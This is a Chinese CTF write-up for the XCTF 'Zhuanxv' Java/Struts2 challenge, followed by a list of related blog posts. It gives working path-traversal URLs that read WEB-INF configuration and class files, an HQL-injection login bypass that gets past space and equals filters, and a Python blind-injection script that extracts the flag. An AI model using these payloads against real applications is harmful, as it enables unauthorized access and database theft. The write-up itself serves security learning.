【XCTF】Zhuanxv

收获

  • java题的一般流程

  • HQL注入

  • SQL注入

看题

  • 目录扫描

    dirsearch扫目录,发现list目录:

    一个登录界面,本着尽量不写sql注入题目的原则(因为太菜了这方面,抓包查看代码:

    js代码中为了加载图片直接写出了后台存储图像路径,那试试能不能通过这个url和参数直接读取源码。

  • 读源码

    先查看web.xml文件:

    http://61.147.171.105:54826/loadimage?fileName=../../WEB-INF/web.xml

    直接得到bg.jpg文件,更改其后缀为xml:

    <?xml version="1.0" encoding="UTF-8"?>
    
<web-app id="WebApp_9" version="2.4"
    
         xmlns="http://java.sun.com/xml/ns/j2ee"
    
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    
    <display-name>Struts Blank</display-name>
    
    <filter>
    
        <filter-name>struts2</filter-name>
    
        <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
    
    </filter>
    
    <filter-mapping>
    
        <filter-name>struts2</filter-name>
    
        <url-pattern>/*</url-pattern>
    
    </filter-mapping>
    
    <welcome-file-list>
    
        <welcome-file>/ctfpage/index.jsp</welcome-file>
    
    </welcome-file-list>
    
    <error-page>
    
        <error-code>404</error-code>
    
        <location>/ctfpage/404.html</location>
    
    </error-page>
    
</web-app>

    这里可以看到是一个struts2框架,于是我们找一下strust.xml:

    http://61.147.171.105:54826/loadimage?fileName=../../WEB-INF/classes/strust.xml

    得到:

    <?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE struts PUBLIC
    
        "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
    
        "http://struts.apache.org/dtds/struts-2.3.dtd">
    
<struts>
    
	<constant name="strutsenableDynamicMethodInvocation" value="false"/>
    
    <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
    
    <constant name="struts.action.extension" value=","/>
    
    <package name="front" namespace="/" extends="struts-default">
    
        <global-exception-mappings>
    
            <exception-mapping exception="java.lang.Exception" result="error"/>
    
        </global-exception-mappings>
    
        <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute">
    
            <result name="error">/ctfpage/login.jsp</result>
    
            <result name="success">/ctfpage/welcome.jsp</result>
    
        </action>
    
        <action name="loadimage" class="com.cuitctf.action.DownloadAction">
    
            <result name="success" type="stream">
    
                <param name="contentType">image/jpeg</param>
    
                <param name="contentDisposition">attachment;filename="bg.jpg"</param>
    
                <param name="inputName">downloadFile</param>
    
            </result>
    
            <result name="suffix_error">/ctfpage/welcome.jsp</result>
    
        </action>
    
    </package>
    
    <package name="back" namespace="/" extends="struts-default">
    
        <interceptors>
    
            <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/>
    
            <interceptor-stack name="userAuth">
    
                <interceptor-ref name="defaultStack" />
    
                <interceptor-ref name="oa" />
    
            </interceptor-stack>

        </interceptors>
    
        <action name="list" class="com.cuitctf.action.AdminAction" method="execute">
    
            <interceptor-ref name="userAuth">
    
                <param name="excludeMethods">
    
                    execute
    
                </param>
    
            </interceptor-ref>
    
            <result name="login_error">/ctfpage/login.jsp</result>
    
            <result name="list_error">/ctfpage/welcome.jsp</result>
    
            <result name="success">/ctfpage/welcome.jsp</result>
    
        </action>
    
    </package>
    
</struts>

    为了登录,先查看com.cuitctf.action.UserLoginAction,其中因为.java文件在被编译后会成为.class文件,所以payload:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class

    看完之后发现也没有什么线索,这里引用了com.cuitctf.util.InitApplicationContext继续看一下:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/InitApplicationContext.class

    反编译成Java文件后发现引用了applicationContext.xml,继续查看:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml

    源码:

    <?xml version="1.0" encoding="UTF-8"?>
    
<beans xmlns="http://www.springframework.org/schema/beans"
    
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    
    <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource">
    
        <property name="driverClassName">
    
            <value>com.mysql.jdbc.Driver</value>
    
        </property>
    
        <property name="url">
    
            <value>jdbc:mysql://localhost:3306/sctf</value>
    
        </property>
    
        <property name="username" value="root"/>
    
        <property name="password" value="root" />
    
    </bean>
    
    <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean">
    
        <property name="dataSource">
    
            <ref bean="dataSource"/>
    
        </property>
    
        <property name="mappingLocations">
    
            <value>user.hbm.xml</value>
    
        </property>
    
        <property name="hibernateProperties">
    
            <props>
    
                <prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialect</prop>
    
                <prop key="hibernate.show_sql">true</prop>
    
            </props>
    
        </property>
    
    </bean>
    
    <bean id="hibernateTemplate"class="org.springframework.orm.hibernate3.HibernateTemplate">
    
        <property name="sessionFactory">
    
            <ref bean="sessionFactory"/>
    
        </property>
    
    </bean>
    
    <bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager">
    
        <property name="sessionFactory">
    
            <ref bean="sessionFactory"/>
    
        </property>
    
    </bean>
    
    <bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true">
    
        <property name="transactionManager">
    
            <ref bean="transactionManager"/>
    
        </property>
    
        <property name="transactionAttributes">
    
            <props>
    
                <prop key="add">PROPAGATION_REQUIRED</prop>
    
                <prop key="find*">PROPAGATION_REQUIRED,readOnly</prop>
    
            </props>
    
        </property>
    
    </bean>
    
    <bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl">
    
        <property name="hibernateTemplate">
    
            <ref bean="hibernateTemplate"/>
    
        </property>
    
    </bean>
    
    <bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl">
    
        <property name="userDao">
    
            <ref bean="userDAO"/>
    
        </property>
    
    </bean>
    
</beans>

    可以看到,这里是连接数据库的关键代码。看一下这些class文件:

    http://61.147.171.105:57101/loadimage?fileName=../../WEB-INF/user.hbm.xml

    user.hbm.xml源码:

    <?xml version="1.0"?>
    
<!DOCTYPE hibernate-mapping PUBLIC
    
        "-//Hibernate/Hibernate Mapping DTD 3.0//EN"
    
        "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd">
    
<hibernate-mapping package="com.cuitctf.po">
    
    <class name="User" table="hlj_members">
    
        <id name="id" column="user_id">
    
            <generator class="identity"/>
    
        </id>
    
        <property name="name"/>
    
        <property name="password"/>
    
    </class>
    
    <class name="Flag" table="bc3fa8be0db46a3610db3ca0ec794c0b">
    
        <id name="flag" column="welcometoourctf">
    
            <generator class="identity"/>
    
        </id>
    
        <property name="flag"/>
    
    </class>
    
</hibernate-mapping>

    UserDaoImpl.class:

    package com.cuitctf.dao.impl;

import com.cuitctf.dao.UserDao;
    
import com.cuitctf.po.User;
    
import java.util.List;
    
import org.springframework.orm.hibernate3.support.HibernateDaoSupport;

public class UserDaoImpl extends HibernateDaoSupport implements UserDao {
    
    public UserDaoImpl() {
    
    }

    public List<User> findUserByName(String name) {
    
        return this.getHibernateTemplate().find("from User where name ='" + name + "'");
    
    }

    public List<User> loginCheck(String name, String password) {
    
        return this.getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
    
    }
    
}

  • 利用

    看了一眼wp,这里是一个HQL注入,其实和SQL注入类似,payload:

    from User where name ='admin' or '1'>'0' or name like 'admin' and password = '" + password + "'

    这里使用'1'>'0'的逻辑绕过万能密码。因为代码中过滤了空格和等号,所以需要用ascii码绕过,并且使用换行代替被过滤的空格。

    admin'%0Aor%0A'1'>'0'%0Aor%0Aname%0Alike%0A'admin

    登录时,password随便设,同时这里需要使用Get方法提交,直接在网页上输入是POST方法,网页没反应。

    虽然登录成功,但是没有FLAG,所以需要根据user.hbm.xml的提示信息进行sql注入。

  • 注入

    贴上大佬的盲注脚本:

    import requests

s = requests.session()

flag = ''
    
for i in range(1, 50):
    
    p = ''
    
    for j in range(1, 255):
    
        # (select ascii(substr(id, "+str(i)+", 1)) from Flag where id < 2) < '
    
        payload = "(select%0Aascii(substr(id," + str(i) + ",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'" + str(j) + "'"
    
        # print payload
    
        url = "http://61.147.171.105:63105/zhuanxvlogin?user.name=admin'%0Aor%0A" + payload + "%0Aor%0Aname%0Alike%0A'admin&user.password=1"
    
        r1 = s.get(url)
    
        if len(r1.text) > 20000 and p != '':
    
            flag += p
    
            print(i, flag)
    
            break
    
        p = chr(j)

参考文章

javaweb项目的文件结构

总结

跟着大佬博客开始学习到java安全相关的东西了。跟同龄大佬的差距真大....真是太低手了

一道入门的java安全题的更多相关文章

  1. 今天考试的JAVA编程题

    今天早上考了java, 题目感觉还不错, 共四道题,有一道定义类的没啥意思就没列出来. 这三道题目还是不错的,特别是第一道,大一上学期学linux的时候,那时还没学C语言呢,准确的来说,还不知道什么是 ...

  2. 一道很经典的 BFS 题

    一道很经典的 BFS 题 想认真的写篇题解. 题目来自:https://www.luogu.org/problemnew/show/P1126 题目描述 机器人移动学会(RMI)现在正尝试用机器人搬运 ...

  3. 牛客网Java刷题知识点之HashMap的实现原理、HashMap的存储结构、HashMap在JDK1.6、JDK1.7、JDK1.8之间的差异以及带来的性能影响

    不多说,直接上干货! 福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑          ...

  4. 牛客网Java刷题知识点之UDP协议是否支持HTTP和HTTPS协议?为什么?TCP协议支持吗?

    不多说,直接上干货! 福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑          ...

  5. 牛客网Java刷题知识点之TCP、UDP、TCP和UDP的区别、socket、TCP编程的客户端一般步骤、TCP编程的服务器端一般步骤、UDP编程的客户端一般步骤、UDP编程的服务器端一般步骤

    福利 => 每天都推送 欢迎大家,关注微信扫码并加入我的4个微信公众号:   大数据躺过的坑      Java从入门到架构师      人工智能躺过的坑         Java全栈大联盟   ...

  6. ACM_一道耗时间的水题

    一道耗时间的水题 Time Limit: 2000/1000ms (Java/Others) Problem Description: Do you know how to read the phon ...

  7. Thrift入门及Java实例演示<转载备用>

    Thrift入门及Java实例演示 作者: Michael 日期: 年 月 日 •概述 •下载配置 •基本概念 .数据类型 .服务端编码基本步骤 .客户端编码基本步骤 .数据传输协议 •实例演示(ja ...

  8. 学Android开发,入门语言java知识点

    学Android开发,入门语言java知识点 Android是一种以Linux为基础的开源码操作系统,主要使用于便携设备,而linux是用c语言和少量汇编语言写成的,如果你想研究Android,就去学 ...

  9. 50道经典的JAVA编程题(汇总)

    这是一次不可思议的编程历程.从2013年的最后一天开始做这份题,中间连续好几天的考试,包括java考试(今天考试的JAVA编程题),直到今天完成了.挺有成就感的...废话不多说了,来电实质性的吧. 全 ...

  10. 50道经典的JAVA编程题(46-50)

    50道经典的JAVA编程题(46-50),最后五道题了,这是一个美妙的过程,编程真的能让我忘掉一切投入其中,感觉很棒.今天下午考完微机原理了,大三上学期就这样度过了,这学期算是解放了,可是感觉我还是没 ...

随机推荐

  1. SRC赏金猎人—笔记二

    以下是如何将速率限制漏洞的影响从低增加到高甚至严重 过程 1.我访问了该网站,然后开始在网站的主文件中手动查找main.js 2.我发现有一个 Web 服务托管在 http:// redacted.c ...

  2. MindSponge分子动力学模拟——安装与使用(2023.08)

    技术背景 昇思MindSpore是由华为主导的一个,面向全场景构建最佳昇腾匹配.支持多处理器架构的开放AI框架.MindSpore不仅仅是软件层面的工具,更重要的是可以协同华为自研的昇腾Ascend平 ...

  3. 千万级数据深分页查询SQL性能优化实践

    一.系统介绍和问题描述 如何在Mysql中实现上亿数据的遍历查询?先来介绍一下系统主角:关注系统,主要是维护京东用户和业务对象之前的关注关系:并对外提供各种关系查询,比如查询用户的关注商品或店铺列表, ...

  4. 在本地运行Kusto服务器

    我喜欢Kusto (或商用版本 Azure Data Explorer,简称 ADX) 是大家可以有目共睹的,之前还专门写过这方面的书籍,请参考 大数据分析新玩法之Kusto宝典, 很可能在今年还会推 ...

  5. Pycharm包推荐|自动检查shell脚本问题的包

    如图,这个包自动会检测出哪块代码编写有问题,自动提示,这里可以根据提示进行修改,快速高效!!! 包的名字如图:Shell script formatter 太香了

  6. HTML网页/KRPano项目一键打包EXE工具(HTML网页打包成单个windows可执行文件exe)

    HTML一键打包EXE工具使用说明 工具简介 HTML一键打包EXE工具(HTML封装EXE,桌件)能把任意HTML项目(网址)一键打包为单个EXE文件,可以脱离浏览器和服务器,直接双击即可运行.支持 ...

  7. [SDR] SDR 教程实战 —— 利用 GNU Radio + HackRF 手把手深入了解蓝牙协议栈(从电磁波 -> 01数据流 -> 蓝牙数据包)

    目录 0.前言 1.体验 2.代码解析 2.1 目录结构 2.2 main.py 2.3 grc gnu radio 流程图 2.4 如何从 01 数据流中解析出 BLE 广播包 2.4.1 物理层 ...

  8. c语言代码练习3改进

    #define _CRT_SECURE_NO_WARNINGS 1 #include <stdio.h> int main() { int x = 0; printf("请输入一 ...

  9. ModelScope

    欢迎来到ModelScope平台!本篇文章介绍如何快速开始使用ModelScope平台上的模型,包括所需的基础概念,环境安装,模型推理和训练的快速实践示例. 如何开始# 如果你是新手,想快速体验产品, ...

  10. DDMS查看Threads情况

    有时候程序运行出现死锁或者信号量卡死是很纠结的问题,单看代码很难分析定位问题,这时候可以借助DDMS来查看threads的运行情况,一目了然. 手机连接上USB,确保adb连通,然后启动Eclipse ...